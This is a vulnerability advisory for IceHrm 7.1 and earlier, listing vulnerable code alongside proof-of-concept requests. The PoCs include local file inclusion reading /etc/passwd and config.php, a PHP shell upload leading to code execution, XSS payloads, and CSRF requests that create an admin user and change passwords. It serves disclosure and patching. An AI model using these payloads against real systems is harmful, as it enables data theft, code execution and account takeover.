IceHrm 7.1 LFI / CSRF / XSS / Shell Upload

`  
IceHrm <=7.1 Multiple Vulnerabilities  
  
  
Vendor: IceHRM  
Product web page: http://www.icehrm.com  
Affected version: <= 7.1  
  
  
Summary: IceHrm is Human Resource Management web software  
for small and medium sized organizations. The software is  
written in PHP. It has community (free), commercial and  
hosted (cloud) solution.  
  
Desc: IceHrm <= 7.1 suffers from multiple vulnerabilities  
including Local File Inclusion, Cross-Site Scripting, Malicious  
File Upload, Cross-Site Request Forgery and Code Execution.  
  
Tested on: Apache/2.2.15 (Unix)  
PHP/5.3.3  
MySQL 5.1.73  
  
  
Vulnerabilities discovered by Stefan 'sm' Petrushevski  
@zeroscience  
  
  
Advisory ID: ZSL-2014-5215  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5215.php  
  
  
01.12.2014  
  
---  
  
  
1. Local File Inclusion (LFI)   
#####################################################  
File:   
app/index.php  
  
Vulnerable code:  
---- snip ----  
include APP_BASE_PATH.'/'.$group.'/'.$name.'/index.php';  
app/?g=../&n=../../../../etc/passwd%00  
---- snip ----  
  
Proof of Concept (PoC):  
http://zsltest/icehrm/app/?g=../&n=../../../../etc/passwd%00  
  
Severity: CRITICAL  
#####################################################  
  
  
2. Local File Inclusion (LFI)  
#####################################################  
File:  
service.php  
  
Vulnerable code:  
---- snip ----  
if($action == 'download'){  
$fileName = $_REQUEST['file'];  
$fileName = CLIENT_BASE_PATH.'data/'.$fileName;  
header('Content-Description: File Transfer');  
header('Content-Type: application/octet-stream');  
header('Content-Disposition: attachment; filename='.basename($fileName));  
header('Content-Transfer-Encoding: binary');  
header('Expires: 0');  
header('Cache-Control: must-revalidate');  
header('Pragma: public');  
header('Content-Length: ' . filesize($fileName));  
ob_clean();  
flush();  
readfile($fileName);  
---- snip ----  
  
Proof of Concept (PoC):  
http://zsltest/icehrm/app/service.php?a=download&file=../config.php  
  
Severity: CRITICAL  
#####################################################  
  
  
3. Malicious File Upload / Code Execution  
#####################################################  
File:  
fileupload.php   
  
Vulnerable code:  
---- snip ----  
//Generate File Name  
$saveFileName = $_POST['file_name'];  
if(empty($saveFileName) || $saveFileName == "_NEW_"){  
$saveFileName = microtime();  
$saveFileName = str_replace(".", "-", $saveFileName);   
}  
  
$file = new File();  
$file->Load("name = ?",array($saveFileName));  
  
// list of valid extensions, ex. array("jpeg", "xml", "bmp")  
  
$allowedExtensions = explode(',', "csv,doc,xls,docx,xlsx,txt,ppt,pptx,rtf,pdf,xml,jpg,bmp,gif,png,jpeg");  
// max file size in bytes  
$sizeLimit =MAX_FILE_SIZE_KB * 1024;  
$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);  
$result = $uploader->handleUpload(CLIENT_BASE_PATH.'data/',$saveFileName);  
// to pass data through iframe you will need to encode all html tags  
  
if($result['success'] == 1){  
$file->name = $saveFileName;  
$file->filename = $result['filename'];  
$file->employee = $_POST['user']=="_NONE_"?null:$_POST['user'];  
$file->file_group = $_POST['file_group'];  
$file->Save();  
$result['data'] = CLIENT_BASE_URL.'data/'.$result['filename'];  
$result['data'] .= "|".$saveFileName;  
$result['data'] .= "|".$file->id;  
}  
---- snip ----  
  
Proof of Concept (PoC) method:  
1. Change the 'file_name' request parameter in desired filename. The file will be saved in 'data' folder.  
Example: file_name = dsadsa.php ==will be saved in==> data/dsadsa.php.txt  
2. Create a malicious file (php shell) save it with .txt extension  
3. Upload the malicious file (php shell) via the upload form in fileupload_page.php. The file will appear in ‘data’ folder as dsadsa.php.txt.  
4. Access the file – http://zsltest/icehrm/data/dsadsa.php.txt to execute the php code.  
  
PoC example:  
1. http://zsltest/icehrm/app/fileupload_page.php?id=xxx.php&msg=Upload%20Attachment&file_group=EmployeeDocument&file_type=all&user=1  
2. xxx.txt contents:  
<?php phpinfo(); ?>  
3. Upload the filename  
4. Access the file:  
  
Severity: CRITICAL  
#####################################################  
  
  
4. Cross-Site Scripting (XSS)  
#####################################################  
File:  
login.php  
  
Vulnerable code:  
---- snip ----  
<script type="text/javascript">  
var key = "";  
<?php if(isset($_REQUEST['key'])){?>  
key = '<?=$_REQUEST['key']?>';  
key = key.replace(/ /g,"+");  
<?php }?>  
---- snip ----  
  
Proof of Concept (PoC):  
http://zsltest/icehrm/app/login.php?key=';</script><script>alert(‘zsl’);</script>  
  
Severity: MEDIUM  
#####################################################  
  
  
5. Cross-Site Scripting (XSS)  
#####################################################  
File:  
fileupload_page.php  
  
Vulnerable code:  
---- snip ----  
<div id="upload_form">  
<form id="upload_data" method="post" action="<?=CLIENT_BASE_URL?>fileupload.php" enctype="multipart/form-data">  
<input id="file_name" name="file_name" type="hidden" value="<?=$_REQUEST['id']?>"/>  
<input id="file_group" name="file_group" type="hidden" value="<?=$_REQUEST['file_group']?>"/>  
<input id="user" name="user" type="hidden" value="<?=$_REQUEST['user']?>"/>  
<label id="upload_status"><?=$_REQUEST['msg']?></label><input id="file" name="file" type="file" onChange="if(checkFileType('file','<?=$fileTypes?>')){uploadfile();}"></input>  
…  
---- snip ----  
  
Vulnerable parameters: id, file_group, user, msg  
  
Proof of Concept (PoC):  
http://zsltest/icehrm/fileupload_page.php?id=XXXX%22%3E%3Cscript%3Ealert(‘zsl’)%3C/script%3E  
  
Severity: MEDIUM  
#####################################################  
  
  
6. Information Disclosure / Leaking Sensitive User Info  
#####################################################  
Users’/employees’ profile images are easily accessible in the ‘data’ folder.  
  
Proof of Concept (PoC):  
http://192.168.200.119/icehrm/app/data/profile_image_1.jpg  
http://192.168.200.119/icehrm/app/data/profile_image_X.jpg <- x=user id  
  
Severity: LOW  
#####################################################  
  
  
7. Cross-Site Request Forgery (CSRF)  
#####################################################  
All forms are vulnerable to CSRF.  
  
Documents library:  
http://localhost/icehrm/app/service.php  
POST   
document=2&valid_until=&status=Inactive&details=detailz&attachment=attachment_evi4t3VuKqDfyY&a=add&t=EmployeeDocument  
  
Personal info:  
http://localhost/icehrm/app/service.php  
GET   
t=Employee  
a=ca  
sa=get  
mod=modules=employees  
req={"map":"{\"nationality\":[\"Nationality\",\"id\",\"name\"],\"employment_status\":[\"EmploymentStatus\",\"id\",\"name\"],\"job_title\":[\"JobTitle\",\"id\",\"name\"],\"pay_grade\":[\"PayGrade\",\"id\",\"name\"],\"country\":[\"Country\",\"code\",\"name\"],\"province\":[\"Province\",\"id\",\"name\"],\"department\":[\"CompanyStructure\",\"id\",\"title\"],\"supervisor\":[\"Employee\",\"id\",\"first_name+last_name\"]}"}  
  
Add new admin user:  
http://localhost/icehrm/app/service.php  
POST  
username=test5&email=test5%40zeroscience.mk&employee=1&user_level=Admin&a=add&t=User  
  
Change password of user:  
http://localhost/icehrm/app/service.php?  
GET  
t=User  
a=ca  
sa=changePassword  
mod=admin=users  
req={"id":5,"pwd":"newpass"}  
  
Add/edit modules:  
http://localhost/icehrm/app/service.php  
POST  
t=Module&a=get&sm=%7B%7D&ft=&ob=  
  
Severity: LOW  
#####################################################  
`